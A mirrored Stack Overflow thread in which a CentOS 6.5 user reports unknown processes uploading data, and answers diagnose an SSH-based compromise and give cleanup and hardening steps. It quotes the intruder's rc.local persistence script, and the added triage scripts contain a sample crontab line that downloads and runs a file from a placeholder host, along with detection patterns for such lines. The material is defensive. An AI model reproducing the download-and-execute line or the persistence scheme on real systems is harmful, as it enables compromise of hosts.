Am I hacked? Unknown processes dsfref, gfhddsfew, dsfref etc. are starting automatically in CentOS 6.5

StackOverflow https://stackoverflow.com/questions/23292718

09-07-2023

Question

I'm using CentOS 6.5. Recently I realised that my computer is uploading something (I didn't even ask for it) at an upload speed of 11 Mbps, but the scary part is that my internet upload speed is 800 Kbps. Every day it shows 200 GB uploaded, and so on. You can see some unknown processes starting in image 1 attached: gfhddsfew, sdmfdsfhjfe, gfhjrtfyhuf, dsfrefr, ferwfrre, rewgtf3er4t, sfewfesfs, sdmfdsfhjfe.

I tried to kill all the processes manually with the kill command and deleted the files from the /etc/ folder, but still, if I connect to the internet, these files get placed in /etc/ automatically. I don't see this issue in Windows (my PC is dual boot).

Note: I used chattr -i to change the permissions and deleted the file sfewfesfs; when I tried to delete the file without using chattr, it says permissions can't be changed / file can't be deleted. One more thing: when I used the command #rm /etc/sfewfesfs without chattr, the computer restarted; it happened every time I tried to delete the file without chattr. And these executables show up in the running processes only when the internet is connected.

Note: I'm using Beam cable internet (beamtele.com, Hyderabad, India).

Here are the images that show the issue:

[Image: Issue depiction #1] [Image: Issue depiction #2]


Solution

Yes, you're hacked!

Congratulations!

It looks like you have a rootkit, or a vulnerability. Try to update your system and use utilities like rkhunter and clamav.

Then you need to check the system files:

rpm -Va   # verify every installed package; in the output, "5" marks a file whose digest no longer matches the package

Or you can fully reinstall your system instead.

OTHER TIPS

It won't help even if you delete these files: /tmp/.sshdd1401029612 or /tmp/.sshddxxxxxxxxxx, /etc/.SSH2, /etc/sfewfesfs

You may first delete a few (binary) files introduced to your system by the intruder:

(A) /etc/rcX.d/S99local

where X = 2, 3, 4, 5

This script will call /etc/rc.d/rc.local to launch several attacks on your system.

(B) So it is better to immediately delete this file as well. As you can see, the content of this file launches several binaries to attack your system:


#!/bin/sh
#
# This script will be executed *after* all the other init scripts.
# You can put your own initialization stuff in here if you don't
# want to do the full Sys V style init stuff.

touch /var/lock/subsys/local
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sdmfdsfhjfe
cd /etc;./gfhddsfew
cd /etc;./ferwfrre
cd /etc;./dsfrefr

It is strongly recommended to delete the file /etc/rc.d/rc.local by force.

(C) After deleting the files above, you can start using sudo to terminate the processes:

(i) /etc/ssh/sshpa

which causes the creation of /tmp/.sshddxxxxxxxxxx, /etc/.SSH2, /etc/sfewfesfs

(ii) and terminate the processes: /tmp/.sshddxxxxxxxxxx, /etc/.SSH2, /etc/sfewfesfs

(D) Please delete these files immediately: /etc/ssh/sshpa, /tmp/.sshddxxxxxxxxxx, /etc/.SSH2, /etc/sfewfesfs

and use htop to make sure they are not launched in the background anymore.

(E) Update your system, and please don't forget to change root's password and all users' passwords.

Unfortunately, chkrootkit and rkhunter may not be able to detect this intruder. Perhaps I don't know how to fully utilize these two rootkit checkers. Or perhaps both rootkit checkers should be updated. Or perhaps there is some other reason...

I found out that there is an executable file .SSH2 in the /etc/ folder. Delete it. It probably causes the creation of another executable file .sshdd1401029612 in the /tmp/ directory, which causes all the trouble. I checked it using htop. The file is big. The other files gfhddsfew, sdmfdsfhjfe, gfhjrtfyhuf, dsfrefr, ferwfrre were probably just dummy files.
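The steps above (rc.local lines that launch binaries out of /etc, the /etc/rcX.d/S99local links, hidden executables such as /tmp/.sshddNNNN and /etc/.SSH2, and the immutable attribute that made rm fail) can be checked without touching anything. The script below is an added example, not code from the answer; it only reports, every function takes a path so it can be aimed at a mounted image or at "/" on the live host, and the sample rc.local it writes is constructed for the demo.

```shell
#!/bin/sh
# Triage helpers for the persistence described on this page. Added example;
# nothing here kills a process or deletes a file.

# rc.local lines of the form "cd /etc;./name" (or /tmp). Prints "lineno:line";
# exit status 0 if at least one such line exists, 1 if none.
rc_local_launchers() {
    grep -nE '^[[:space:]]*cd[[:space:]]+/(etc|tmp)[[:space:]]*;[[:space:]]*\./' "$1"
}

# Distinct binary names launched by those lines (the script above repeats
# the same seven names many times; this is the short list to inspect).
rc_local_binaries() {
    rc_local_launchers "$1" | sed -E 's/.*\.\/([^[:space:];&|]+).*/\1/' | sort -u
}

# SysV start links for runlevels 2-5 (tip A: /etc/rcX.d/S99local).
# $1 is the filesystem root to inspect; "/" for the live system.
s99local_links() {
    root="${1:-/}"
    for lvl in 2 3 4 5; do
        link="$root/etc/rc$lvl.d/S99local"
        if [ -e "$link" ] || [ -L "$link" ]; then
            printf '%s -> %s\n' "$link" "$(readlink "$link" 2>/dev/null || echo '(regular file)')"
        fi
    done
    return 0
}

# Executable dotfiles directly under a directory, e.g. /tmp/.sshdd1401029612
# or /etc/.SSH2. Legitimate hidden *executables* in /tmp or /etc are rare.
hidden_executables() {
    find "$1" -maxdepth 1 -type f -name '.*' -perm -u+x 2>/dev/null
}

# Files in a directory carrying the immutable attribute, which is why rm
# failed until chattr -i was used. Needs lsattr (e2fsprogs); prints nothing
# when it is not installed or the filesystem does not support attributes.
immutable_files() {
    command -v lsattr >/dev/null 2>&1 || return 0
    lsattr -d "$1"/* "$1"/.[!.]* 2>/dev/null | awk '$1 ~ /i/ { print $2 }'
}

# Constructed sample rc.local in the shape quoted above, written to $1,
# so the helpers can be tried without an infected host.
write_sample_rc_local() {
    cat > "$1" <<'EOF'
#!/bin/sh
touch /var/lock/subsys/local
cd /etc;./sfewfesfs
cd /etc;./gfhjrtfyhuf
cd /etc;./rewgtf3er4t
cd /etc;./sfewfesfs
EOF
}

# Full report for a filesystem root (default "/"): sh triage.sh --scan [root]
triage() {
    root="${1:-/}"
    echo "== rc.local launchers"; rc_local_launchers "$root/etc/rc.d/rc.local" || echo "(none)"
    echo "== S99local links";     s99local_links "$root"
    for d in "$root/tmp" "$root/etc"; do
        echo "== hidden executables in $d"; hidden_executables "$d"
        echo "== immutable files in $d";    immutable_files "$d"
    done
}

if [ "${1:-}" = "--scan" ]; then
    triage "${2:-/}"
fi
```

Run it as root on the affected machine (or against a mounted copy of its disk) before deleting anything, so the list of names, links and immutable files is recorded; the answer's own deletion steps then have something to be checked against.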

Thanks for sharing your problem. If you had not shared it, it would have been very difficult to come to a quick conclusion.

I'm also using cable internet in Mumbai. It's a virus attack. Linux?? Virus??? Yeah, this was my reaction too.

Finally I found that it was because of root access to the machine through SSH, because of a weak password (password "root").

To disable SSH root login, edit /etc/ssh/sshd_config and add/modify the following line:

PermitRootLogin no

References: https://forum.manjaro.org/index.php?topic=13806.0

Also have a look at: https://isc.sans.edu/forums/diary/Unfriendly+crontab+additions/17282/ Your crontab may be similar; in any case get rid of those nasty entries before you delete the aforementioned files. Clamav found two exploits on my server, and my crontab listed www.frade8c.com, which was tracked to Beijing. After doing all of the above, including disabling remote root login, make sure to close/change port 22 (if using SSH) and randomize your root password, 15 characters minimum.
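Two of the fixes recommended in the last few answers deserve a check rather than a blind edit: the sshd_config change (PermitRootLogin no, plus the port change and password-login advice above) and the crontab cleanup from the SANS diary link. The script below is an added example, not code from either answer. It reads the effective sshd setting the way sshd does (first uncommented occurrence wins, and anything under a Match block is conditional), writes a hardened copy of the config, and flags crontab lines that download or run things from /tmp or hidden paths. The alternative port 2222, the accepted PermitRootLogin values, and the two sample files it writes are assumptions made for the demo.

```shell
#!/bin/sh
# Audit/hardening helpers for sshd_config and crontab. Added example.

# Effective value of an sshd_config keyword. sshd keeps the FIRST uncommented
# occurrence, so a "PermitRootLogin no" appended at the bottom of a file that
# says "yes" higher up changes nothing. Scanning stops at the first "Match"
# block because keywords there are conditional. $3 is the compiled-in default
# reported when the keyword is absent.
sshd_effective() {
    awk -v key="$2" -v def="$3" '
        /^[ \t]*#/ || /^[ \t]*$/    { next }
        tolower($1) == "match"      { exit }
        tolower($1) == tolower(key) { print $2; found = 1; exit }
        END { if (!found) print def }' "$1"
}

# One line per weak setting; the return value is the number of findings.
audit_sshd_config() {
    cfg="$1"; bad=0
    v=$(sshd_effective "$cfg" PermitRootLogin yes)   # default was "yes" in OpenSSH 5.3 (CentOS 6)
    case "$v" in
        no|prohibit-password|without-password) ;;    # no root password logins (assumed acceptable)
        *) echo "PermitRootLogin=$v: root can log in with a password"; bad=$((bad+1)) ;;
    esac
    v=$(sshd_effective "$cfg" PasswordAuthentication yes)
    [ "$v" = "no" ] || { echo "PasswordAuthentication=$v: dictionary attacks can succeed"; bad=$((bad+1)); }
    v=$(sshd_effective "$cfg" Port 22)
    [ "$v" != "22" ] || { echo "Port=22: default port draws constant scanning"; bad=$((bad+1)); }
    return $bad
}

# Hardened copy of $1 written to $2: existing uncommented lines for the
# keywords we set are dropped and ours go first, since first wins. Install
# and test a key for an unprivileged user BEFORE reloading sshd with
# PasswordAuthentication off, or you lock yourself out.
harden_sshd_config() {
    src="$1"; dst="$2"; port="${3:-2222}"   # 2222 is an arbitrary choice for the demo
    {
        printf 'Port %s\nPermitRootLogin no\nPasswordAuthentication no\nPubkeyAuthentication yes\n' "$port"
        awk '/^[ \t]*#/ { print; next }
             { k = tolower($1) }
             k == "port" || k == "permitrootlogin" || k == "passwordauthentication" || k == "pubkeyauthentication" { next }
             { print }' "$src"
    } > "$dst"
    # Syntax check when sshd is installed (reading host keys needs root).
    if command -v sshd >/dev/null 2>&1; then
        sshd -t -f "$dst" 2>/dev/null || echo "note: sshd -t did not pass; rerun as root: sshd -t -f $dst"
    fi
}

# Crontab lines that download something, run out of /tmp or /dev/shm, or
# execute a hidden path: the shape of the additions in the SANS diary.
# Comment lines are ignored. Prints "lineno:line".
suspicious_cron_lines() {
    grep -nE 'wget|curl|https?://|/tmp/|/dev/shm/|/\.[A-Za-z0-9]' "$1" | grep -vE '^[0-9]+:[[:space:]]*#'
}

# Constructed sample files (not from the affected host), written under $1.
write_samples() {
    cat > "$1/sshd_config.weak" <<'EOF'
# sshd_config as shipped: root and password logins still allowed
#PermitRootLogin yes
PasswordAuthentication yes
Port 22
X11Forwarding no
Match User backup
    ForceCommand /usr/bin/rsync --server
EOF
    cat > "$1/crontab" <<'EOF'
# constructed /etc/crontab
*/10 * * * * root /usr/bin/updatedb
* * * * * root wget -q http://c2.example.invalid/x -O /tmp/x; sh /tmp/x
@reboot root /etc/.SSH2
EOF
}

# Live audit: sh sshaudit.sh --audit
if [ "${1:-}" = "--audit" ]; then
    audit_sshd_config /etc/ssh/sshd_config || echo "$? weak setting(s) found"
    for f in /etc/crontab /etc/cron.d/* /var/spool/cron/*; do
        [ -f "$f" ] && suspicious_cron_lines "$f" | sed "s|^|$f:|"
    done
fi
```

Changing the port only reduces scanner noise; the settings that actually close the door used here are PermitRootLogin no and PasswordAuthentication no, and the audit function is the check to run after editing, because a second, earlier PermitRootLogin line silently overrides a new one added at the end.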

This link was in a post from the review queue which apparently was a test I failed - whoops. However, I thought it was interesting to see the sort of things that a naughty script could do: http://pastebin.com/9iqWhWde

Adding lots to rc.local, clearing logs, killing processes (iptables and, I presume, other bots), and adding stuff to cron, of course. If someone else is infected with this or something similar, it would give them a few good places to check for damage.

I had the same issue on a server. You need to find a way to make the space available on the disk 0% or the folder not writable. Then delete all the files and you should be free to go.

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow